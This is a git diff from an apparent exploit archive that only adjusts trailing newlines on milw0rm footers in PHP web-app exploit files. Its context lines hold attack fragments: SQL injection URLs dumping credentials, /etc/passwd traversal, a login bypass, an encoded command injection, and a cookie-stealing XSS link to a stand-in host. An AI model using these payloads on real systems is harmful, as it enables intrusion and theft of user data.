@@ -72,4 +72,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-01-13] +# milw0rm.com [2008-01-13] \ No newline at end of file diff --git a/platforms/php/webapps/4905.pl b/platforms/php/webapps/4905.pl index 91ba0ebfb..c4ce2f549 100755 --- a/platforms/php/webapps/4905.pl +++ b/platforms/php/webapps/4905.pl @@ -51,4 +51,4 @@ else{ print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; } -# milw0rm.com [2008-01-13] +# milw0rm.com [2008-01-13] \ No newline at end of file diff --git a/platforms/php/webapps/4907.py b/platforms/php/webapps/4907.py index 440d452a5..5e0ff887f 100755 --- a/platforms/php/webapps/4907.py +++ b/platforms/php/webapps/4907.py @@ -55,4 +55,4 @@ file.write("******************************************************************** file.close() print "Successfull, please review the ",out_file," file." -# milw0rm.com [2008-01-14] +# milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/4908.pl b/platforms/php/webapps/4908.pl index 8436869c0..91731384f 100755 --- a/platforms/php/webapps/4908.pl +++ b/platforms/php/webapps/4908.pl @@ -61,4 +61,4 @@ while(true) { } } -# milw0rm.com [2008-01-14] +# milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/platforms/php/webapps/4912.txt b/platforms/php/webapps/4912.txt index d1235cc5b..b04c3a374 100755 --- a/platforms/php/webapps/4912.txt +++ b/platforms/php/webapps/4912.txt @@ -47,4 +47,4 @@ example: http://localhost/lulieblog/Admin/article_suppr.php?id=4 Delete the article with id=4 -# milw0rm.com [2008-01-15] +# milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/4914.txt b/platforms/php/webapps/4914.txt index 3eccbf3ee..17d5705d6 100755 --- a/platforms/php/webapps/4914.txt +++ b/platforms/php/webapps/4914.txt @@ -21,4 +21,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-15] +# milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/4915.txt b/platforms/php/webapps/4915.txt index 5c95629ea..b2cd9b3cc 100755 --- a/platforms/php/webapps/4915.txt +++ b/platforms/php/webapps/4915.txt @@ -21,4 +21,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-15] +# milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/4916.txt b/platforms/php/webapps/4916.txt index c6a5f2d52..c45ac55ae 100755 --- a/platforms/php/webapps/4916.txt +++ b/platforms/php/webapps/4916.txt @@ -16,4 +16,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-15] +# milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/4917.txt b/platforms/php/webapps/4917.txt index 865c9e225..8bafeb0d2 100755 --- a/platforms/php/webapps/4917.txt +++ b/platforms/php/webapps/4917.txt @@ -21,4 +21,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-15] +# milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/php/webapps/4919.txt b/platforms/php/webapps/4919.txt index af7fea643..969155b4f 100755 --- a/platforms/php/webapps/4919.txt +++ b/platforms/php/webapps/4919.txt @@ -116,4 +116,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4920.txt b/platforms/php/webapps/4920.txt index 6c2eb4c8f..5b30b967e 100755 --- a/platforms/php/webapps/4920.txt +++ b/platforms/php/webapps/4920.txt @@ -53,4 +53,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4922.txt b/platforms/php/webapps/4922.txt index 4e1115cc4..bb9e771b6 100755 --- a/platforms/php/webapps/4922.txt +++ b/platforms/php/webapps/4922.txt @@ -136,4 +136,4 @@ # ID = an_userID' or 1='1 # password = whatever -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4924.php b/platforms/php/webapps/4924.php index 82e378c73..c437a579e 100755 --- a/platforms/php/webapps/4924.php +++ b/platforms/php/webapps/4924.php @@ -142,4 +142,4 @@ print "------------------------------------------------------------------------- ?> -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4925.txt b/platforms/php/webapps/4925.txt index 7b8d985e2..515771e28 100755 --- a/platforms/php/webapps/4925.txt +++ b/platforms/php/webapps/4925.txt @@ -18,4 +18,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4926.pl b/platforms/php/webapps/4926.pl index dcb28c735..4ac555150 100755 --- a/platforms/php/webapps/4926.pl +++ b/platforms/php/webapps/4926.pl @@ -64,4 +64,4 @@ print "Web is not vuln\n"; --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4927.php b/platforms/php/webapps/4927.php index 815474eb9..eed143054 100755 --- a/platforms/php/webapps/4927.php +++ b/platforms/php/webapps/4927.php @@ -102,4 +102,4 @@ if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} ?> -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4928.txt b/platforms/php/webapps/4928.txt index b1cce5bd7..6ea5764d4 100755 --- a/platforms/php/webapps/4928.txt +++ b/platforms/php/webapps/4928.txt @@ -106,4 +106,4 @@ Waraxe forum: http://www.waraxe.us/forums.html ---------------------------------- [ EOF ] ------------------------------------ -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/php/webapps/4929.txt b/platforms/php/webapps/4929.txt index 7d8e11ba2..9870e233e 100755 --- a/platforms/php/webapps/4929.txt +++ b/platforms/php/webapps/4929.txt @@ -20,4 +20,4 @@ http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20selec PHPEcho CMS Remote SQL Injection Exploit ######################################################################### -# milw0rm.com [2008-01-17] +# milw0rm.com [2008-01-17] \ No newline at end of file diff --git a/platforms/php/webapps/4930.txt b/platforms/php/webapps/4930.txt index d40308680..2c05cee1f 100755 --- a/platforms/php/webapps/4930.txt +++ b/platforms/php/webapps/4930.txt @@ -15,4 +15,4 @@ http://server.com/Path/pages/upload.php?language=[-LFI-] # http://www.galaxyscripts.com/demo/mfh12/ -# milw0rm.com [2008-01-17] +# milw0rm.com [2008-01-17] \ No newline at end of file diff --git a/platforms/php/webapps/4933.pl b/platforms/php/webapps/4933.pl index c60b5cbfd..7eb58127a 100755 --- a/platforms/php/webapps/4933.pl +++ b/platforms/php/webapps/4933.pl @@ -131,4 +131,4 @@ print "[+]perintah => "; $perintah = ; } -# milw0rm.com [2008-01-18] +# milw0rm.com [2008-01-18] \ No newline at end of file diff --git a/platforms/php/webapps/4936.txt b/platforms/php/webapps/4936.txt index 586f00406..84e625a89 100755 --- a/platforms/php/webapps/4936.txt +++ b/platforms/php/webapps/4936.txt @@ -9,4 +9,4 @@ Greetz: S4nt0!, Yubix, Xarnuz, Chame, Electr0cbax, komtec1, f34r [+] Exploit: info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00 -# milw0rm.com [2008-01-18] +# milw0rm.com [2008-01-18] \ No newline at end of file diff --git a/platforms/php/webapps/4937.txt b/platforms/php/webapps/4937.txt index 230e0963f..36812c6d3 100755 --- a/platforms/php/webapps/4937.txt +++ b/platforms/php/webapps/4937.txt @@ -43,4 +43,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , AlQaTaRi , God-Father And Best Wishes -# milw0rm.com [2008-01-18] +# milw0rm.com [2008-01-18] \ No newline at end of file diff --git a/platforms/php/webapps/4939.txt b/platforms/php/webapps/4939.txt index cb6b158ef..67ef76880 100755 --- a/platforms/php/webapps/4939.txt +++ b/platforms/php/webapps/4939.txt @@ -20,4 +20,4 @@ this is example http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/* -# milw0rm.com [2008-01-19] +# milw0rm.com [2008-01-19] \ No newline at end of file diff --git a/platforms/php/webapps/4940.pl b/platforms/php/webapps/4940.pl index ae66439aa..5abc0897c 100755 --- a/platforms/php/webapps/4940.pl +++ b/platforms/php/webapps/4940.pl @@ -67,4 +67,4 @@ print $response->content; exit(0); -# milw0rm.com [2008-01-20] +# milw0rm.com [2008-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/4942.txt b/platforms/php/webapps/4942.txt index a0ea0eec1..ae9e230e5 100755 --- a/platforms/php/webapps/4942.txt +++ b/platforms/php/webapps/4942.txt @@ -2,4 +2,4 @@ TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability http://www.vulnsite.com/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234 -# milw0rm.com [2008-01-20] +# milw0rm.com [2008-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/4943.txt b/platforms/php/webapps/4943.txt index ecd1605b1..59484d3a1 100755 --- a/platforms/php/webapps/4943.txt +++ b/platforms/php/webapps/4943.txt @@ -26,4 +26,4 @@ H-T Team = HouSSaMix + ToXiC350 + RxH - H-T Team -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims -- ------------------------------------------------------------------------------------------ -# milw0rm.com [2008-01-20] +# milw0rm.com [2008-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/4944.txt b/platforms/php/webapps/4944.txt index f92721c08..4ce5e8cf4 100755 --- a/platforms/php/webapps/4944.txt +++ b/platforms/php/webapps/4944.txt @@ -14,4 +14,4 @@ Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+selec Details: number of columns may be >20, admin panel - http://www.site.com/adm/login.php -# milw0rm.com [2008-01-20] +# milw0rm.com [2008-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/4945.txt b/platforms/php/webapps/4945.txt index 9c9f33d0a..0118c5052 100755 --- a/platforms/php/webapps/4945.txt +++ b/platforms/php/webapps/4945.txt @@ -103,4 +103,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-20] +# milw0rm.com [2008-01-20] \ No newline at end of file diff --git a/platforms/php/webapps/4950.php b/platforms/php/webapps/4950.php index 89ee653db..41e5b3e36 100755 --- a/platforms/php/webapps/4950.php +++ b/platforms/php/webapps/4950.php @@ -117,4 +117,4 @@ if ($argc != 4) { } ?> -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4951.txt b/platforms/php/webapps/4951.txt index c23e5250e..f2cfd1935 100755 --- a/platforms/php/webapps/4951.txt +++ b/platforms/php/webapps/4951.txt @@ -17,4 +17,4 @@ http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id # Greetz to: forum.antichat.ru -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4952.txt b/platforms/php/webapps/4952.txt index 398e7d9e1..098366d78 100755 --- a/platforms/php/webapps/4952.txt +++ b/platforms/php/webapps/4952.txt @@ -32,4 +32,4 @@ Send the post "swagger:e74c7cc56d033d32b8cb465c2bbc379b" to a friend ------------------------------------- mybe other versions are Vulnerbil too :) -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4953.txt b/platforms/php/webapps/4953.txt index 9376704c8..d37edc167 100755 --- a/platforms/php/webapps/4953.txt +++ b/platforms/php/webapps/4953.txt @@ -35,4 +35,4 @@ $pfile = file_get_contents("$datadirectory/$id.php"); # In memoriam Anna-Emilia... # -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4954.txt b/platforms/php/webapps/4954.txt index 5f9bbca1e..29d7345fa 100755 --- a/platforms/php/webapps/4954.txt +++ b/platforms/php/webapps/4954.txt @@ -25,4 +25,4 @@ or try to get /etc/passwd :) [*]---------------------------------------------------------- -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4955.txt b/platforms/php/webapps/4955.txt index a1f52428b..f3a20882c 100755 --- a/platforms/php/webapps/4955.txt +++ b/platforms/php/webapps/4955.txt @@ -12,4 +12,4 @@ admin/functions/inc.steps.check_login.php?MY_CONF[classRoot]=Shell admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shell ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4956.txt b/platforms/php/webapps/4956.txt index 0533ae372..83e31f51e 100755 --- a/platforms/php/webapps/4956.txt +++ b/platforms/php/webapps/4956.txt @@ -31,4 +31,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4957.txt b/platforms/php/webapps/4957.txt index 7a6371fb5..27eac12fd 100755 --- a/platforms/php/webapps/4957.txt +++ b/platforms/php/webapps/4957.txt @@ -41,4 +41,4 @@ except urllib2.HTTPError: print "Ok, the file: "+archivo+" was created, and you can logging setting the cookie MOIN_ID='"+archivo+"'"+" in your browser." sys.exit(0) -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/php/webapps/4958.txt b/platforms/php/webapps/4958.txt index d02305c3f..079f1196f 100755 --- a/platforms/php/webapps/4958.txt +++ b/platforms/php/webapps/4958.txt @@ -46,4 +46,4 @@ href='http://server/stealcookies?"+encodeURI(document.cookie)+"'>here
";docum # Good luck, and be safe. Greetings to the light of my life, innoscent. # -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4960.txt b/platforms/php/webapps/4960.txt index e48b2c3cd..f82ea59ad 100755 --- a/platforms/php/webapps/4960.txt +++ b/platforms/php/webapps/4960.txt @@ -25,4 +25,4 @@ # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4961.php b/platforms/php/webapps/4961.php index c4a8dd0ce..78aeea5c3 100755 --- a/platforms/php/webapps/4961.php +++ b/platforms/php/webapps/4961.php @@ -231,4 +231,4 @@ Exploiting: ?> -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4962.pl b/platforms/php/webapps/4962.pl index 69344a00b..adce3d713 100755 --- a/platforms/php/webapps/4962.pl +++ b/platforms/php/webapps/4962.pl @@ -318,4 +318,4 @@ $_text_1->insert('end', "[-] Error: ".$res->status_line."\n"); } 1; -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4963.pl b/platforms/php/webapps/4963.pl index 842153c28..143b4f405 100755 --- a/platforms/php/webapps/4963.pl +++ b/platforms/php/webapps/4963.pl @@ -589,4 +589,4 @@ sub Dialog::ui { 1; -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4964.php b/platforms/php/webapps/4964.php index 062c04561..ba5d83cfc 100755 --- a/platforms/php/webapps/4964.php +++ b/platforms/php/webapps/4964.php @@ -60,4 +60,4 @@ exit; ?> -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4965.php b/platforms/php/webapps/4965.php index fbb300902..f38ff127c 100755 --- a/platforms/php/webapps/4965.php +++ b/platforms/php/webapps/4965.php @@ -141,4 +141,4 @@ agent print $result; ?> -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4966.pl b/platforms/php/webapps/4966.pl index c62ee8d06..a029be31b 100755 --- a/platforms/php/webapps/4966.pl +++ b/platforms/php/webapps/4966.pl @@ -303,4 +303,4 @@ $InfoWindow->Show(); $InfoWindow->destroy; } -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/php/webapps/4968.txt b/platforms/php/webapps/4968.txt index 45273bc53..2f6bb1968 100755 --- a/platforms/php/webapps/4968.txt +++ b/platforms/php/webapps/4968.txt @@ -20,4 +20,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/php/webapps/4969.txt b/platforms/php/webapps/4969.txt index 1cda8c0e1..1ae4c1f66 100755 --- a/platforms/php/webapps/4969.txt +++ b/platforms/php/webapps/4969.txt @@ -16,4 +16,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/php/webapps/4973.txt b/platforms/php/webapps/4973.txt index 4c9d2a316..8c8299579 100755 --- a/platforms/php/webapps/4973.txt +++ b/platforms/php/webapps/4973.txt @@ -15,4 +15,4 @@ # # ##################################################################################### -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/php/webapps/4975.txt b/platforms/php/webapps/4975.txt index 8dbb23513..26275cbf8 100755 --- a/platforms/php/webapps/4975.txt +++ b/platforms/php/webapps/4975.txt @@ -27,4 +27,4 @@ http://[targethost]/[path]/index.php?newlang=../../../../../../../../../../etc/p # See u soon! -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/php/webapps/4976.txt b/platforms/php/webapps/4976.txt index e93995a9b..63bfb2c1d 100755 --- a/platforms/php/webapps/4976.txt +++ b/platforms/php/webapps/4976.txt @@ -15,4 +15,4 @@ ###### H-T Team , v4 Team , Tryag , no-hack all my friend ##### #################################################################################### -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/php/webapps/4980.txt b/platforms/php/webapps/4980.txt index 0c0601f77..a71e52ad0 100755 --- a/platforms/php/webapps/4980.txt +++ b/platforms/php/webapps/4980.txt @@ -38,4 +38,4 @@ Greetings to: d3hydr8, whoami, beenu, kasi, MosDef, etc Everyone at darkc0de.com & rootmybox.org -# milw0rm.com [2008-01-24] +# milw0rm.com [2008-01-24] \ No newline at end of file diff --git a/platforms/php/webapps/4984.txt b/platforms/php/webapps/4984.txt index b35a42501..46e55aa42 100755 --- a/platforms/php/webapps/4984.txt +++ b/platforms/php/webapps/4984.txt @@ -12,4 +12,4 @@ Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux, Aristo89 -# milw0rm.com [2008-01-25] +# milw0rm.com [2008-01-25] \ No newline at end of file diff --git a/platforms/php/webapps/4985.txt b/platforms/php/webapps/4985.txt index 5238ca69a..e48995a55 100755 --- a/platforms/php/webapps/4985.txt +++ b/platforms/php/webapps/4985.txt @@ -39,4 +39,4 @@ http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/* # Gr33tz : CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers -# milw0rm.com [2008-01-25] +# milw0rm.com [2008-01-25] \ No newline at end of file diff --git a/platforms/php/webapps/4989.txt b/platforms/php/webapps/4989.txt index 19d66c5fb..6be9799c6 100755 --- a/platforms/php/webapps/4989.txt +++ b/platforms/php/webapps/4989.txt @@ -75,4 +75,4 @@ example: salam tuk: ira, sukabirus network community, akillers 179,bidulux,sibalbal,crutz_ao, -# milw0rm.com [2008-01-26] +# milw0rm.com [2008-01-26] \ No newline at end of file diff --git a/platforms/php/webapps/4990.txt b/platforms/php/webapps/4990.txt index d78f5c58c..9975187bb 100755 --- a/platforms/php/webapps/4990.txt +++ b/platforms/php/webapps/4990.txt @@ -26,4 +26,4 @@ advantage of this vulnerability (see above.) Proof of concept: http(s)://path/to/phpip/display.php?range=view&id=0%20UNION%20SELECT%20null,null,null,null,null,null,uid,username,password,email,null,null,null,null,null,null,null,null,null,null%20%20FROM%20users--&iprange=0&netid=0 -# milw0rm.com [2008-01-26] +# milw0rm.com [2008-01-26] \ No newline at end of file diff --git a/platforms/php/webapps/4991.txt b/platforms/php/webapps/4991.txt index 82357abcc..c3999149a 100755 --- a/platforms/php/webapps/4991.txt +++ b/platforms/php/webapps/4991.txt @@ -21,4 +21,4 @@ Greetz : H-T Team , v4 Team , Tryag , no-hack all my friend Special tnx for : Houssamix thx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke -# milw0rm.com [2008-01-26] +# milw0rm.com [2008-01-26] \ No newline at end of file diff --git a/platforms/php/webapps/4992.txt b/platforms/php/webapps/4992.txt index 11030b713..93cd638e5 100755 --- a/platforms/php/webapps/4992.txt +++ b/platforms/php/webapps/4992.txt @@ -27,4 +27,4 @@ admin login http://target.il/wordpress_path/wp/wp-login.php ------------------------|| Viva Palestine ||------------------------------ ------------------------|| FREE GaZZA ||------------------------------ -# milw0rm.com [2008-01-27] +# milw0rm.com [2008-01-27] \ No newline at end of file diff --git a/platforms/php/webapps/4993.txt b/platforms/php/webapps/4993.txt index bad786657..ca496a31e 100755 --- a/platforms/php/webapps/4993.txt +++ b/platforms/php/webapps/4993.txt @@ -32,4 +32,4 @@ admin login http://target.il/wordpress_path/wp/wp-login.php ------------------------|| Viva Palestine ||------------------------------ ------------------------|| FREE GaZZA ||------------------------------ -# milw0rm.com [2008-01-27] +# milw0rm.com [2008-01-27] \ No newline at end of file diff --git a/platforms/php/webapps/5000.txt b/platforms/php/webapps/5000.txt index 2b72412ae..ab229a731 100755 --- a/platforms/php/webapps/5000.txt +++ b/platforms/php/webapps/5000.txt @@ -35,4 +35,4 @@ This Is Really Bye NET :( For Ever ) ######################################################################### -# milw0rm.com [2008-01-28] +# milw0rm.com [2008-01-28] \ No newline at end of file diff --git a/platforms/php/webapps/5001.txt b/platforms/php/webapps/5001.txt index c0dc53ba3..ef508f3bc 100755 --- a/platforms/php/webapps/5001.txt +++ b/platforms/php/webapps/5001.txt @@ -17,4 +17,4 @@ Greetz : H-T Team , v4 Team , Tryag , no-hack all my friend Special tnx for : Houssamix thx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke -# milw0rm.com [2008-01-28] +# milw0rm.com [2008-01-28] \ No newline at end of file diff --git a/platforms/php/webapps/5002.txt b/platforms/php/webapps/5002.txt index deb4bae5d..1759ad1d5 100755 --- a/platforms/php/webapps/5002.txt +++ b/platforms/php/webapps/5002.txt @@ -46,4 +46,4 @@ GreetZ 2 Shadowleet and some more ;) PS: Immer wenn mir langweilig ist, dann veröffentliche ich Sicherheitslücken... -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/php/webapps/5003.txt b/platforms/php/webapps/5003.txt index eae0959d3..deacfc531 100755 --- a/platforms/php/webapps/5003.txt +++ b/platforms/php/webapps/5003.txt @@ -17,4 +17,4 @@ ### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a) ###################################################################### -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/php/webapps/5006.txt b/platforms/php/webapps/5006.txt index 37dede1b6..567ad1744 100755 --- a/platforms/php/webapps/5006.txt +++ b/platforms/php/webapps/5006.txt @@ -151,4 +151,4 @@ vulnerability reports, advisories and whitepapers posted regularly on our websit Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/php/webapps/5007.txt b/platforms/php/webapps/5007.txt index 2c8254e45..954d683a8 100755 --- a/platforms/php/webapps/5007.txt +++ b/platforms/php/webapps/5007.txt @@ -29,4 +29,4 @@ index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/* notes: "Newsletter component for mambo 4.5" from Adam van Dongen, www.tim-online.nl //Thanks George -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/php/webapps/5008.txt b/platforms/php/webapps/5008.txt index 98566f41b..12eda8ac4 100755 --- a/platforms/php/webapps/5008.txt +++ b/platforms/php/webapps/5008.txt @@ -25,4 +25,4 @@ index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,p # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/php/webapps/5009.txt b/platforms/php/webapps/5009.txt index b27b5222f..e3e5486f8 100755 --- a/platforms/php/webapps/5009.txt +++ b/platforms/php/webapps/5009.txt @@ -25,4 +25,4 @@ index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/** # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/php/webapps/5010.txt b/platforms/php/webapps/5010.txt index 75694871b..71e992852 100755 --- a/platforms/php/webapps/5010.txt +++ b/platforms/php/webapps/5010.txt @@ -25,4 +25,4 @@ index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20selec # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5011.txt b/platforms/php/webapps/5011.txt index 2e90ea5c7..a69ae9111 100755 --- a/platforms/php/webapps/5011.txt +++ b/platforms/php/webapps/5011.txt @@ -52,4 +52,4 @@ index.php?option=com_buslicense§ionid=9999&Itemid=9999&task=list&aid=-1/**/u # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5012.pl b/platforms/php/webapps/5012.pl index 6768a712f..21f3dd948 100755 --- a/platforms/php/webapps/5012.pl +++ b/platforms/php/webapps/5012.pl @@ -54,4 +54,4 @@ else { $data=get($morocco); print $data ; } } -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5013.php b/platforms/php/webapps/5013.php index 7508bc38e..b600cce52 100755 --- a/platforms/php/webapps/5013.php +++ b/platforms/php/webapps/5013.php @@ -84,4 +84,4 @@ exit("Error:Libcurl isnt installed \n"); ?> -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5014.txt b/platforms/php/webapps/5014.txt index 5c6da317b..ada96bfa2 100755 --- a/platforms/php/webapps/5014.txt +++ b/platforms/php/webapps/5014.txt @@ -23,4 +23,4 @@ index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/* # S@BUN GOOD LUCKY S@BUN ######################################################################### -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5015.txt b/platforms/php/webapps/5015.txt index f67199948..b5739390e 100755 --- a/platforms/php/webapps/5015.txt +++ b/platforms/php/webapps/5015.txt @@ -35,4 +35,4 @@ index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/sel 1.0 -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5016.txt b/platforms/php/webapps/5016.txt index a6e6fedc1..304717f4a 100755 --- a/platforms/php/webapps/5016.txt +++ b/platforms/php/webapps/5016.txt @@ -34,4 +34,4 @@ This component is released under the GNU/GPL License 0.1 EstateAgent component for Mambo 4.5.x -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5017.php b/platforms/php/webapps/5017.php index 399c0babe..d53b6a69c 100755 --- a/platforms/php/webapps/5017.php +++ b/platforms/php/webapps/5017.php @@ -93,4 +93,4 @@ exit("Error:Libcurl isnt installed \n"); ?> -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5018.pl b/platforms/php/webapps/5018.pl index ec674bc3a..8a7c9a6e5 100755 --- a/platforms/php/webapps/5018.pl +++ b/platforms/php/webapps/5018.pl @@ -227,4 +227,4 @@ $InfoWindow->Show(); $InfoWindow->destroy; } -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5019.txt b/platforms/php/webapps/5019.txt index b296eff96..7739b0c11 100755 --- a/platforms/php/webapps/5019.txt +++ b/platforms/php/webapps/5019.txt @@ -131,4 +131,4 @@ Waraxe forum: http://www.waraxe.us/forums.html ---------------------------------- [ EOF ] -------------------------------- -# milw0rm.com [2008-01-30] +# milw0rm.com [2008-01-30] \ No newline at end of file diff --git a/platforms/php/webapps/5020.txt b/platforms/php/webapps/5020.txt index 3af1d527e..f30d30bf7 100755 --- a/platforms/php/webapps/5020.txt +++ b/platforms/php/webapps/5020.txt @@ -49,4 +49,4 @@ * 